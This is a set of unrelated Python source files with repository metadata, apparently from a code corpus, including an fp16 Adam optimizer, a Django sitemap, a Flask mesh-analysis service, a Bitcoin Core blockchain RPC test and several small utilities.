                       per_category_to_sample=per_category_to_sample,
                       num_categories_to_sample=num_categories_to_sample)
  y_ = y_.to(device, torch.int64)
  return z_, y_
def initiate_standing_stats(net):
  """Reset and enable standing-stats accumulation on every submodule that supports it."""
  for module in net.modules():
    if not hasattr(module, 'accumulate_standing'):
      continue
    module.reset_stats()
    module.accumulate_standing = True
def accumulate_standing_stats(net, z, y, nclasses, num_accumulations=16):
  """Run forward passes to accumulate standing BN stats, then switch net to eval."""
  initiate_standing_stats(net)
  net.train()
  for _ in range(num_accumulations):
    with torch.no_grad():
      # Fresh noise and labels for every accumulation pass.
      z.normal_()
      y.random_(0, nclasses)
      x = net(z, net.shared(y)) # No need to parallelize here unless using syncbn
  # Set to eval mode
  net.eval()
# This version of Adam keeps an fp32 copy of the parameters and
# does all of the parameter updates in fp32, while still doing the
# forwards and backwards passes using fp16 (i.e. fp16 copies of the
# parameters and fp16 activations).
#
# Note that this calls .float().cuda() on the params.
import math
from torch.optim.optimizer import Optimizer
class Adam16(Optimizer):
  """Adam for fp16 training with an fp32 master copy of the parameters.

  Gradients and parameters may be fp16; all moment/statistics math runs in
  fp32, and the updated master weights are written back to the fp16 params.
  """
  def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,weight_decay=0):
    defaults = dict(lr=lr, betas=betas, eps=eps,
                    weight_decay=weight_decay)
    params = list(params)
    super(Adam16, self).__init__(params, defaults)

  # Safety modification to make sure we floatify our state
  def load_state_dict(self, state_dict):
    """Load optimizer state, forcing moments and master weights back to fp32."""
    super(Adam16, self).load_state_dict(state_dict)
    for group in self.param_groups:
      for p in group['params']:
        self.state[p]['exp_avg'] = self.state[p]['exp_avg'].float()
        self.state[p]['exp_avg_sq'] = self.state[p]['exp_avg_sq'].float()
        self.state[p]['fp32_p'] = self.state[p]['fp32_p'].float()

  def step(self, closure=None):
    """Performs a single optimization step.

    Arguments:
      closure (callable, optional): A closure that reevaluates the model
        and returns the loss.
    """
    loss = None
    if closure is not None:
      loss = closure()
    for group in self.param_groups:
      for p in group['params']:
        if p.grad is None:
          continue
        # All update math happens on an fp32 copy of the gradient.
        grad = p.grad.data.float()
        state = self.state[p]
        # State initialization
        if len(state) == 0:
          state['step'] = 0
          # Exponential moving averages of gradient and squared gradient
          # (modernized from grad.new().resize_as_(grad).zero_()).
          state['exp_avg'] = torch.zeros_like(grad)
          state['exp_avg_sq'] = torch.zeros_like(grad)
          # Fp32 copy of the weights
          state['fp32_p'] = p.data.float()
        exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
        beta1, beta2 = group['betas']
        state['step'] += 1
        if group['weight_decay'] != 0:
          # BUG FIX: the positional-scalar forms add_(scalar, tensor),
          # addcmul_(scalar, t1, t2) and addcdiv_(scalar, t1, t2) were
          # deprecated and then removed from PyTorch; use the keyword
          # alpha=/value= forms, which are numerically identical.
          grad = grad.add(state['fp32_p'], alpha=group['weight_decay'])
        # Decay the first and second moment running average coefficient
        exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1)
        exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2)
        denom = exp_avg_sq.sqrt().add_(group['eps'])
        bias_correction1 = 1 - beta1 ** state['step']
        bias_correction2 = 1 - beta2 ** state['step']
        step_size = group['lr'] * math.sqrt(bias_correction2) / bias_correction1
        state['fp32_p'].addcdiv_(exp_avg, denom, value=-step_size)
        # Write the fp32 master weights back into the fp16 parameter.
        p.data = state['fp32_p'].half()
    return loss
| 41.27673
| 109
| 0.647665
|
794b2bcd1edf31cf42f4e4fdf0deed65e35d3dd5
| 292
|
py
|
Python
|
slimbb/sitemap.py
|
hsoft/slimbb
|
763cb9e0f3daacdcba5cb2b913600a6351ea88e2
|
[
"BSD-3-Clause"
] | 1
|
2016-09-04T20:11:17.000Z
|
2016-09-04T20:11:17.000Z
|
slimbb/sitemap.py
|
hsoft/slimbb
|
763cb9e0f3daacdcba5cb2b913600a6351ea88e2
|
[
"BSD-3-Clause"
] | null | null | null |
slimbb/sitemap.py
|
hsoft/slimbb
|
763cb9e0f3daacdcba5cb2b913600a6351ea88e2
|
[
"BSD-3-Clause"
] | null | null | null |
from django.contrib.sitemaps import Sitemap
from .models import Forum, Topic
class SitemapForum(Sitemap):
    """Django sitemap section listing every Forum."""
    priority = 0.5  # search-engine priority hint for forum URLs
    def items(self):
        """Return the queryset of forums to include in the sitemap."""
        return Forum.objects.all()
class SitemapTopic(Sitemap):
    """Django sitemap section listing every Topic."""
    priority = 0.5  # search-engine priority hint for topic URLs
    def items(self):
        """Return the queryset of topics to include in the sitemap."""
        return Topic.objects.all()
| 16.222222
| 43
| 0.678082
|
794b2bfe8fa481966e81921d4dd2a2b1270d0e22
| 513
|
py
|
Python
|
packages/python/plotly/plotly/validators/parcoords/line/_colorscale.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/parcoords/line/_colorscale.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
packages/python/plotly/plotly/validators/parcoords/line/_colorscale.py
|
mastermind88/plotly.py
|
efa70710df1af22958e1be080e105130042f1839
|
[
"MIT"
] | null | null | null |
import _plotly_utils.basevalidators
class ColorscaleValidator(_plotly_utils.basevalidators.ColorscaleValidator):
    """Auto-generated validator for the `parcoords.line.colorscale` property."""
    def __init__(
        self, plotly_name="colorscale", parent_name="parcoords.line", **kwargs
    ):
        super(ColorscaleValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            # Changing the colorscale triggers a full recalculation by default.
            edit_type=kwargs.pop("edit_type", "calc"),
            # Setting an explicit colorscale implies autocolorscale=False.
            implied_edits=kwargs.pop("implied_edits", {"autocolorscale": False}),
            **kwargs,
        )
| 34.2
| 81
| 0.662768
|
794b2c650b06970b7d6e2a53648676d37bdaf727
| 2,152
|
py
|
Python
|
backend/src/app.py
|
gbernardino/RVparcellation
|
d6068f22eea4fe045f5ce7e19a54344c91a0090f
|
[
"MIT"
] | null | null | null |
backend/src/app.py
|
gbernardino/RVparcellation
|
d6068f22eea4fe045f5ce7e19a54344c91a0090f
|
[
"MIT"
] | null | null | null |
backend/src/app.py
|
gbernardino/RVparcellation
|
d6068f22eea4fe045f5ce7e19a54344c91a0090f
|
[
"MIT"
] | null | null | null |
from flask import Flask, send_file, jsonify
from flask_restful import Resource, Api, request
from flask_cors import CORS
import sys, os, pathlib
import computeRegionalVolumeDynamics, utilities
app = Flask(__name__)
api = Api(app)
CORS(app)
@app.route('/computePartitionSingleIndividual', methods = [ 'POST'])
def computePartitionSingleIndividual():
    """Compute regional RV volume dynamics for one patient.

    Expects a multipart POST with form fields `pId` (patient id) and optional
    `format` (mesh file extension, default 'vtk'), plus one uploaded mesh file
    per timepoint, keyed by an integer timepoint index.
    Returns a JSON object with regional EDV and EF measurements.
    """
    pId = request.form['pId']
    format = request.form.get('format', 'vtk')
    print('pID =', pId, type(pId), file=sys.stderr)
    # Stage uploads under /tmp/<pId>.
    folderPath = pathlib.Path('/tmp') / pId
    folderPath.mkdir(parents=True, exist_ok=True)
    meshes = {}
    #Write files to the tmp folder
    print('Format = ', format)
    for t in request.files:
        print(t)
        # NOTE(review): '%3d' space-pads the index; '%03d' (zero-padding) was
        # probably intended -- confirm against downstream file naming.
        path = str(folderPath / (pId + '_%3d' % int(t) ) )
        request.files[t].save(path + '.' + format)
        # The pipeline consumes .vtk paths; non-vtk uploads are converted below.
        meshes[t] = path + '.vtk'
    utilities.convert_ucd_to_vtk(folderPath, folderPath)
    #Do the computations <- Try cellery for a more elegant approach
    values = computeRegionalVolumeDynamics.computeEDVEF(meshes)
    #Return the computations (so far only the measurements, possibly return also the partitions (for ED and ES))
    return jsonify({'outflowEDV' : values[0],'inletEDV' : values[1], 'apicalEDV' : values[2], 'outflowEF' : values[3],'inletEF' : values[4], 'apicalEF' : values[5]})
    #For returning files, see https://stackoverflow.com/questions/28568687/download-multiple-csvs-using-flask/41374226
    #return send_file(path, as_attachment=True)
@app.route('/testGet', methods = [ 'GET'])
def testGet():
    """Health-check endpoint; returns a fixed JSON payload."""
    return jsonify({'meow' : 'test'})
@app.route('/getFile', methods = [ 'GET'])
def getFile():
    """Serve a previously generated file from /tmp/<pId>/<fileName>.

    Reads `pId` and `fileName` from the request form and returns the file
    as an attachment.
    """
    pId = request.form['pId']
    # BUG FIX: this previously read request.form['pId'] again, so fileName
    # was always the patient id rather than the requested file name.
    fileName = request.form['fileName']
    # Hardening: keep only the final path component of each field so callers
    # cannot traverse outside /tmp with '..' or absolute paths. A whitelist
    # of known filenames would be stronger still.
    path = pathlib.Path('/tmp') / pathlib.Path(pId).name / pathlib.Path(fileName).name
    return send_file(str(path), as_attachment=True)
def test():
    """Run the EDV/EF computation on the bundled example meshes and print it."""
    path = './Data/Example'
    meshes = [os.path.join(path, name) for name in sorted(os.listdir(path))]
    print(computeRegionalVolumeDynamics.computeEDVEF(meshes))
if __name__ == '__main__':
    # NOTE(review): debug=True plus binding 0.0.0.0 exposes the Werkzeug
    # debugger to the network -- disable debug for production deployments.
    app.run(debug=True, host='0.0.0.0')
| 39.851852
| 165
| 0.681227
|
794b2cb012281b930eee070328c0784a7d017d4d
| 911
|
py
|
Python
|
pworm/data.py
|
emuggie/serverlease-python
|
88999823132fc60b400991b0b9c0a34feeb686ee
|
[
"BSD-3-Clause"
] | null | null | null |
pworm/data.py
|
emuggie/serverlease-python
|
88999823132fc60b400991b0b9c0a34feeb686ee
|
[
"BSD-3-Clause"
] | null | null | null |
pworm/data.py
|
emuggie/serverlease-python
|
88999823132fc60b400991b0b9c0a34feeb686ee
|
[
"BSD-3-Clause"
] | null | null | null |
"""
"""
class Stack :
    """A LIFO container backed by a list. A non-positive max (default -1)
    means unbounded capacity."""

    def __init__(self, max = -1):
        self._list = []   # storage; top of the stack is the last element
        self._max = max   # capacity limit; <= 0 disables the check

    def get(self) :
        """Pop and return the top value. Raises IndexError when empty."""
        if not self._list:
            raise IndexError()
        return self._list.pop()

    def put(self, *values):
        """Push one or more values. Raises IndexError if capacity would be exceeded."""
        if self._max > 0 and len(self._list) + len(values) > self._max :
            raise IndexError()
        self._list.extend(values)

    def peek(self) :
        """Return the top value without removing it. Raises IndexError when empty."""
        if not self._list:
            raise IndexError()
        return self._list[-1]

    def size(self):
        """Return the number of stored values."""
        return len(self._list)
class Queue(Stack) :
    """FIFO variant of Stack: get/peek operate on the oldest element."""

    def get(self) :
        """Remove and return the oldest value. Raises IndexError when empty."""
        if not self._list:
            raise IndexError()
        return self._list.pop(0)

    def peek(self) :
        """Return the oldest value without removing it. Raises IndexError when empty."""
        if not self._list:
            raise IndexError()
        return self._list[0]

    def last(self) :
        """Return the newest value (equivalent to Stack.peek)."""
        return super().peek()
| 21.186047
| 68
| 0.500549
|
794b2e5e0810f7111fccbab3f1545c92a4498782
| 18,850
|
py
|
Python
|
test/functional/rpc_blockchain.py
|
tryphe/bitcoin
|
da1c0c64fd094880712d1c4167ad9eb3bb6ffcc6
|
[
"MIT"
] | 1
|
2021-08-23T05:28:07.000Z
|
2021-08-23T05:28:07.000Z
|
test/functional/rpc_blockchain.py
|
GoodGooGleINS/bitcoin
|
71797beec54d36a055d5e172ecbf2141fa984428
|
[
"MIT"
] | null | null | null |
test/functional/rpc_blockchain.py
|
GoodGooGleINS/bitcoin
|
71797beec54d36a055d5e172ecbf2141fa984428
|
[
"MIT"
] | 1
|
2021-08-01T02:56:10.000Z
|
2021-08-01T02:56:10.000Z
|
#!/usr/bin/env python3
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test RPCs related to blockchainstate.
Test the following RPCs:
- getblockchaininfo
- getchaintxstats
- gettxoutsetinfo
- getblockheader
- getdifficulty
- getnetworkhashps
- waitforblockheight
- getblock
- getblockhash
- getbestblockhash
- verifychain
Tests correspond to code in rpc/blockchain.cpp.
"""
from decimal import Decimal
import http.client
import os
import subprocess
from test_framework.address import ADDRESS_BCRT1_P2WSH_OP_TRUE
from test_framework.blocktools import (
create_block,
create_coinbase,
TIME_GENESIS_BLOCK,
)
from test_framework.messages import (
CBlockHeader,
from_hex,
msg_block,
)
from test_framework.p2p import P2PInterface
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import (
assert_equal,
assert_greater_than,
assert_greater_than_or_equal,
assert_raises,
assert_raises_rpc_error,
assert_is_hex_string,
assert_is_hash_string,
get_datadir_path,
)
from test_framework.wallet import MiniWallet
HEIGHT = 200 # blocks mined
TIME_RANGE_STEP = 600 # ten-minute steps
TIME_RANGE_MTP = TIME_GENESIS_BLOCK + (HEIGHT - 6) * TIME_RANGE_STEP
TIME_RANGE_END = TIME_GENESIS_BLOCK + HEIGHT * TIME_RANGE_STEP
class BlockchainTest(BitcoinTestFramework):
    def set_test_params(self):
        """Run a single node on a fresh (clean-chain) regtest network."""
        self.setup_clean_chain = True
        self.num_nodes = 1
        self.supports_cli = False
    def run_test(self):
        """Mine a deterministic 200-block chain, then drive every sub-test."""
        self.mine_chain()
        self.restart_node(0, extra_args=['-stopatheight=207', '-prune=1'])  # Set extra args with pruning after rescan is complete

        self._test_getblockchaininfo()
        self._test_getchaintxstats()
        self._test_gettxoutsetinfo()
        self._test_getblockheader()
        self._test_getdifficulty()
        self._test_getnetworkhashps()
        self._test_stopatheight()
        self._test_waitforblockheight()
        self._test_getblock()
        # verifychain(4, 0): highest check level over all retained blocks.
        assert self.nodes[0].verifychain(4, 0)
    def mine_chain(self):
        """Mine HEIGHT blocks with mocktime advancing TIME_RANGE_STEP per block."""
        self.log.info(f"Generate {HEIGHT} blocks after the genesis block in ten-minute steps")
        for t in range(TIME_GENESIS_BLOCK, TIME_RANGE_END, TIME_RANGE_STEP):
            # Pin the node clock so each block's timestamp is exactly one step apart.
            self.nodes[0].setmocktime(t)
            self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_P2WSH_OP_TRUE)
        assert_equal(self.nodes[0].getblockchaininfo()['blocks'], HEIGHT)
    def _test_getblockchaininfo(self):
        """Check getblockchaininfo keys/values under manual, no, and automatic pruning."""
        self.log.info("Test getblockchaininfo")

        # Keys expected with pruning disabled; pruning modes add extra keys.
        keys = [
            'bestblockhash',
            'blocks',
            'chain',
            'chainwork',
            'difficulty',
            'headers',
            'initialblockdownload',
            'mediantime',
            'pruned',
            'size_on_disk',
            'softforks',
            'time',
            'verificationprogress',
            'warnings',
        ]
        res = self.nodes[0].getblockchaininfo()

        assert_equal(res['time'], TIME_RANGE_END - TIME_RANGE_STEP)
        assert_equal(res['mediantime'], TIME_RANGE_MTP)

        # result should have these additional pruning keys if manual pruning is enabled
        assert_equal(sorted(res.keys()), sorted(['pruneheight', 'automatic_pruning'] + keys))

        # size_on_disk should be > 0
        assert_greater_than(res['size_on_disk'], 0)

        # pruneheight should be greater or equal to 0
        assert_greater_than_or_equal(res['pruneheight'], 0)

        # check other pruning fields given that prune=1
        assert res['pruned']
        assert not res['automatic_pruning']

        self.restart_node(0, ['-stopatheight=207'])
        res = self.nodes[0].getblockchaininfo()
        # should have exact keys
        assert_equal(sorted(res.keys()), keys)

        self.restart_node(0, ['-stopatheight=207', '-prune=550'])
        res = self.nodes[0].getblockchaininfo()
        # result should have these additional pruning keys if prune=550
        assert_equal(sorted(res.keys()), sorted(['pruneheight', 'automatic_pruning', 'prune_target_size'] + keys))

        # check related fields
        assert res['pruned']
        assert_equal(res['pruneheight'], 0)
        assert res['automatic_pruning']
        # -prune=550 MiB => 550 * 1024 * 1024 bytes.
        assert_equal(res['prune_target_size'], 576716800)
        assert_greater_than(res['size_on_disk'], 0)

        assert_equal(res['softforks'], {
            'bip34': {'type': 'buried', 'active': False, 'height': 500},
            'bip66': {'type': 'buried', 'active': False, 'height': 1251},
            'bip65': {'type': 'buried', 'active': False, 'height': 1351},
            'csv': {'type': 'buried', 'active': False, 'height': 432},
            'segwit': {'type': 'buried', 'active': True, 'height': 0},
            'testdummy': {
                'type': 'bip9',
                'bip9': {
                    'status': 'started',
                    'bit': 28,
                    'start_time': 0,
                    'timeout': 0x7fffffffffffffff,  # testdummy does not have a timeout so is set to the max int64 value
                    'since': 144,
                    'statistics': {
                        'period': 144,
                        'threshold': 108,
                        'elapsed': HEIGHT - 143,
                        'count': HEIGHT - 143,
                        'possible': True,
                    },
                    'min_activation_height': 0,
                },
                'active': False
            },
            'taproot': {
                'type': 'bip9',
                'bip9': {
                    'status': 'active',
                    'start_time': -1,
                    'timeout': 9223372036854775807,
                    'since': 0,
                    'min_activation_height': 0,
                },
                'height': 0,
                'active': True
            }
        })
    def _test_getchaintxstats(self):
        """Exercise getchaintxstats error paths and statistics over various windows."""
        self.log.info("Test getchaintxstats")

        # Test `getchaintxstats` invalid extra parameters
        assert_raises_rpc_error(-1, 'getchaintxstats', self.nodes[0].getchaintxstats, 0, '', 0)

        # Test `getchaintxstats` invalid `nblocks`
        assert_raises_rpc_error(-1, "JSON value is not an integer as expected", self.nodes[0].getchaintxstats, '')
        assert_raises_rpc_error(-8, "Invalid block count: should be between 0 and the block's height - 1", self.nodes[0].getchaintxstats, -1)
        assert_raises_rpc_error(-8, "Invalid block count: should be between 0 and the block's height - 1", self.nodes[0].getchaintxstats, self.nodes[0].getblockcount())

        # Test `getchaintxstats` invalid `blockhash`
        assert_raises_rpc_error(-1, "JSON value is not a string as expected", self.nodes[0].getchaintxstats, blockhash=0)
        assert_raises_rpc_error(-8, "blockhash must be of length 64 (not 1, for '0')", self.nodes[0].getchaintxstats, blockhash='0')
        assert_raises_rpc_error(-8, "blockhash must be hexadecimal string (not 'ZZZ0000000000000000000000000000000000000000000000000000000000000')", self.nodes[0].getchaintxstats, blockhash='ZZZ0000000000000000000000000000000000000000000000000000000000000')
        assert_raises_rpc_error(-5, "Block not found", self.nodes[0].getchaintxstats, blockhash='0000000000000000000000000000000000000000000000000000000000000000')
        # A block off the active chain must be rejected, then restored.
        blockhash = self.nodes[0].getblockhash(HEIGHT)
        self.nodes[0].invalidateblock(blockhash)
        assert_raises_rpc_error(-8, "Block is not in main chain", self.nodes[0].getchaintxstats, blockhash=blockhash)
        self.nodes[0].reconsiderblock(blockhash)

        chaintxstats = self.nodes[0].getchaintxstats(nblocks=1)
        # 200 txs plus genesis tx
        assert_equal(chaintxstats['txcount'], HEIGHT + 1)
        # tx rate should be 1 per 10 minutes, or 1/600
        # we have to round because of binary math
        assert_equal(round(chaintxstats['txrate'] * TIME_RANGE_STEP, 10), Decimal(1))

        b1_hash = self.nodes[0].getblockhash(1)
        b1 = self.nodes[0].getblock(b1_hash)
        b200_hash = self.nodes[0].getblockhash(HEIGHT)
        b200 = self.nodes[0].getblock(b200_hash)
        time_diff = b200['mediantime'] - b1['mediantime']

        # Default window: from block 1 to the tip.
        chaintxstats = self.nodes[0].getchaintxstats()
        assert_equal(chaintxstats['time'], b200['time'])
        assert_equal(chaintxstats['txcount'], HEIGHT + 1)
        assert_equal(chaintxstats['window_final_block_hash'], b200_hash)
        assert_equal(chaintxstats['window_final_block_height'], HEIGHT )
        assert_equal(chaintxstats['window_block_count'], HEIGHT - 1)
        assert_equal(chaintxstats['window_tx_count'], HEIGHT - 1)
        assert_equal(chaintxstats['window_interval'], time_diff)
        assert_equal(round(chaintxstats['txrate'] * time_diff, 10), Decimal(HEIGHT - 1))

        # A zero-length window (anchored at block 1) omits the rate fields.
        chaintxstats = self.nodes[0].getchaintxstats(blockhash=b1_hash)
        assert_equal(chaintxstats['time'], b1['time'])
        assert_equal(chaintxstats['txcount'], 2)
        assert_equal(chaintxstats['window_final_block_hash'], b1_hash)
        assert_equal(chaintxstats['window_final_block_height'], 1)
        assert_equal(chaintxstats['window_block_count'], 0)
        assert 'window_tx_count' not in chaintxstats
        assert 'window_interval' not in chaintxstats
        assert 'txrate' not in chaintxstats
def _test_gettxoutsetinfo(self):
node = self.nodes[0]
res = node.gettxoutsetinfo()
assert_equal(res['total_amount'], Decimal('8725.00000000'))
assert_equal(res['transactions'], HEIGHT)
assert_equal(res['height'], HEIGHT)
assert_equal(res['txouts'], HEIGHT)
assert_equal(res['bogosize'], 16800),
assert_equal(res['bestblock'], node.getblockhash(HEIGHT))
size = res['disk_size']
assert size > 6400
assert size < 64000
assert_equal(len(res['bestblock']), 64)
assert_equal(len(res['hash_serialized_2']), 64)
self.log.info("Test gettxoutsetinfo works for blockchain with just the genesis block")
b1hash = node.getblockhash(1)
node.invalidateblock(b1hash)
res2 = node.gettxoutsetinfo()
assert_equal(res2['transactions'], 0)
assert_equal(res2['total_amount'], Decimal('0'))
assert_equal(res2['height'], 0)
assert_equal(res2['txouts'], 0)
assert_equal(res2['bogosize'], 0),
assert_equal(res2['bestblock'], node.getblockhash(0))
assert_equal(len(res2['hash_serialized_2']), 64)
self.log.info("Test gettxoutsetinfo returns the same result after invalidate/reconsider block")
node.reconsiderblock(b1hash)
res3 = node.gettxoutsetinfo()
# The field 'disk_size' is non-deterministic and can thus not be
# compared between res and res3. Everything else should be the same.
del res['disk_size'], res3['disk_size']
assert_equal(res, res3)
self.log.info("Test gettxoutsetinfo hash_type option")
# Adding hash_type 'hash_serialized_2', which is the default, should
# not change the result.
res4 = node.gettxoutsetinfo(hash_type='hash_serialized_2')
del res4['disk_size']
assert_equal(res, res4)
# hash_type none should not return a UTXO set hash.
res5 = node.gettxoutsetinfo(hash_type='none')
assert 'hash_serialized_2' not in res5
# hash_type muhash should return a different UTXO set hash.
res6 = node.gettxoutsetinfo(hash_type='muhash')
assert 'muhash' in res6
assert(res['hash_serialized_2'] != res6['muhash'])
# muhash should not be returned unless requested.
for r in [res, res2, res3, res4, res5]:
assert 'muhash' not in r
# Unknown hash_type raises an error
assert_raises_rpc_error(-8, "foohash is not a valid hash_type", node.gettxoutsetinfo, "foohash")
    def _test_getblockheader(self):
        """Validate getblockheader fields, error paths, and the verbose=False hex form."""
        self.log.info("Test getblockheader")
        node = self.nodes[0]

        assert_raises_rpc_error(-8, "hash must be of length 64 (not 8, for 'nonsense')", node.getblockheader, "nonsense")
        assert_raises_rpc_error(-8, "hash must be hexadecimal string (not 'ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844')", node.getblockheader, "ZZZ7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844")
        assert_raises_rpc_error(-5, "Block not found", node.getblockheader, "0cf7bb8b1697ea987f3b223ba7819250cae33efacb068d23dc24859824a77844")

        besthash = node.getbestblockhash()
        secondbesthash = node.getblockhash(HEIGHT - 1)
        header = node.getblockheader(blockhash=besthash)

        assert_equal(header['hash'], besthash)
        assert_equal(header['height'], HEIGHT)
        assert_equal(header['confirmations'], 1)
        assert_equal(header['previousblockhash'], secondbesthash)
        assert_is_hex_string(header['chainwork'])
        assert_equal(header['nTx'], 1)
        assert_is_hash_string(header['hash'])
        assert_is_hash_string(header['previousblockhash'])
        assert_is_hash_string(header['merkleroot'])
        # 'bits' is hex but shorter than a hash, so skip the length check.
        assert_is_hash_string(header['bits'], length=None)
        assert isinstance(header['time'], int)
        assert_equal(header['mediantime'], TIME_RANGE_MTP)
        assert isinstance(header['nonce'], int)
        assert isinstance(header['version'], int)
        assert isinstance(int(header['versionHex'], 16), int)
        assert isinstance(header['difficulty'], Decimal)

        # Test with verbose=False, which should return the header as hex.
        header_hex = node.getblockheader(blockhash=besthash, verbose=False)
        assert_is_hex_string(header_hex)

        # Round-trip: the hex must deserialize to a header with the same hash.
        header = from_hex(CBlockHeader(), header_hex)
        header.calc_sha256()
        assert_equal(header.hash, besthash)

        # Genesis has no predecessor; the tip has no successor.
        assert 'previousblockhash' not in node.getblockheader(node.getblockhash(0))
        assert 'nextblockhash' not in node.getblockheader(node.getbestblockhash())
def _test_getdifficulty(self):
self.log.info("Test getdifficulty")
difficulty = self.nodes[0].getdifficulty()
# 1 hash in 2 should be valid, so difficulty should be 1/2**31
# binary => decimal => binary math is why we do this check
assert abs(difficulty * 2**31 - 1) < 0.0001
def _test_getnetworkhashps(self):
self.log.info("Test getnetworkhashps")
hashes_per_second = self.nodes[0].getnetworkhashps()
# This should be 2 hashes every 10 minutes or 1/300
assert abs(hashes_per_second * 300 - 1) < 0.0001
    def _test_stopatheight(self):
        """Verify the node shuts itself down exactly when -stopatheight=207 is reached."""
        self.log.info("Test stopping at height")
        assert_equal(self.nodes[0].getblockcount(), HEIGHT)
        self.nodes[0].generatetoaddress(6, ADDRESS_BCRT1_P2WSH_OP_TRUE)
        assert_equal(self.nodes[0].getblockcount(), HEIGHT + 6)
        self.log.debug('Node should not stop at this height')
        # Waiting for the process to exit must time out: we are below 207.
        assert_raises(subprocess.TimeoutExpired, lambda: self.nodes[0].process.wait(timeout=3))
        try:
            self.nodes[0].generatetoaddress(1, ADDRESS_BCRT1_P2WSH_OP_TRUE)
        except (ConnectionError, http.client.BadStatusLine):
            pass  # The node already shut down before response
        self.log.debug('Node should stop at this height...')
        self.nodes[0].wait_until_stopped()
        self.start_node(0)
        assert_equal(self.nodes[0].getblockcount(), HEIGHT + 7)
def _test_waitforblockheight(self):
    """Check waitforblockheight behaviour after a side-chain fork is invalidated."""
    self.log.info("Test waitforblockheight")
    node = self.nodes[0]
    peer = node.add_p2p_connection(P2PInterface())

    current_height = node.getblock(node.getbestblockhash())['height']

    # Create a fork somewhere below our current height, invalidate the tip
    # of that fork, and then ensure that waitforblockheight still
    # works as expected.
    #
    # (Previously this was broken based on setting
    # `rpc/blockchain.cpp:latestblock` incorrectly.)
    #
    b20hash = node.getblockhash(20)
    b20 = node.getblock(b20hash)

    def solve_and_send_block(prevhash, height, time):
        # Mine a block on top of prevhash and deliver it over the P2P peer.
        b = create_block(prevhash, create_coinbase(height), time)
        b.solve()
        peer.send_and_ping(msg_block(b))
        return b

    b21f = solve_and_send_block(int(b20hash, 16), 21, b20['time'] + 1)
    b22f = solve_and_send_block(b21f.sha256, 22, b21f.nTime + 1)

    node.invalidateblock(b22f.hash)

    def assert_waitforheight(height, timeout=2):
        # Regardless of the height waited for, the RPC must report the main
        # chain's current height once it returns (or times out).
        assert_equal(
            node.waitforblockheight(height=height, timeout=timeout)['height'],
            current_height)

    assert_waitforheight(0)
    assert_waitforheight(current_height - 1)
    assert_waitforheight(current_height)
    assert_waitforheight(current_height + 1)
def _test_getblock(self):
    """Exercise getblock verbosity levels, fee reporting, and pruned undo data."""
    node = self.nodes[0]

    miniwallet = MiniWallet(node)
    miniwallet.scan_blocks(num=5)

    fee_per_byte = Decimal('0.00000010')
    fee_per_kb = 1000 * fee_per_byte

    miniwallet.send_self_transfer(fee_rate=fee_per_kb, from_node=node)
    blockhash = node.generate(1)[0]

    self.log.info("Test getblock with verbosity 1 doesn't include fee")
    block = node.getblock(blockhash, 1)
    assert 'fee' not in block['tx'][1]

    self.log.info('Test getblock with verbosity 2 includes expected fee')
    block = node.getblock(blockhash, 2)
    tx = block['tx'][1]
    assert 'fee' in tx
    assert_equal(tx['fee'], tx['vsize'] * fee_per_byte)

    self.log.info("Test getblock with verbosity 2 still works with pruned Undo data")
    datadir = get_datadir_path(self.options.tmpdir, 0)

    self.log.info("Test getblock with invalid verbosity type returns proper error message")
    assert_raises_rpc_error(-1, "JSON value is not an integer as expected", node.getblock, blockhash, "2")

    def move_block_file(old, new):
        # Relocate a block/undo file inside the node's datadir.
        old_path = os.path.join(datadir, self.chain, 'blocks', old)
        new_path = os.path.join(datadir, self.chain, 'blocks', new)
        os.rename(old_path, new_path)

    # Move instead of deleting so we can restore chain state afterwards
    move_block_file('rev00000.dat', 'rev_wrong')

    # Without undo data the fee cannot be computed, so getblock omits it.
    block = node.getblock(blockhash, 2)
    assert 'fee' not in block['tx'][1]

    # Restore chain state
    move_block_file('rev_wrong', 'rev00000.dat')

    # Genesis has no predecessor and the tip has no successor.
    assert 'previousblockhash' not in node.getblock(node.getblockhash(0))
    assert 'nextblockhash' not in node.getblock(node.getbestblockhash())
if __name__ == '__main__':
    # Standard functional-test entry point: run the test directly.
    BlockchainTest().main()
| 41.796009
| 257
| 0.649973
|
794b30f9d5f596015058b0eedfbe781de00ec979
| 1,518
|
py
|
Python
|
rapidtide/tests/test_fullrunhappy_v1.py
|
bbfrederick/rapidtide
|
ddd1899a93fafd550feb134debdd028bbba8c853
|
[
"Apache-2.0"
] | 44
|
2017-01-19T10:12:39.000Z
|
2022-02-08T05:43:58.000Z
|
rapidtide/tests/test_fullrunhappy_v1.py
|
bbfrederick/delaytools
|
190d79ae4c19317dfce38a528e43fd05459f29a5
|
[
"Apache-2.0"
] | 70
|
2018-05-02T14:35:45.000Z
|
2022-03-18T17:43:33.000Z
|
rapidtide/tests/test_fullrunhappy_v1.py
|
bbfrederick/delaytools
|
190d79ae4c19317dfce38a528e43fd05459f29a5
|
[
"Apache-2.0"
] | 12
|
2019-02-12T20:40:27.000Z
|
2021-06-16T13:28:21.000Z
|
#!/usr/bin/env python
# -*- coding: latin-1 -*-
#
# Copyright 2016-2021 Blaise Frederick
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#
import os
import matplotlib as mpl
import rapidtide.workflows.happy as happy_workflow
import rapidtide.workflows.happy_parser as happy_parser
from rapidtide.tests.utils import create_dir, get_examples_path, get_test_temp_path, mse
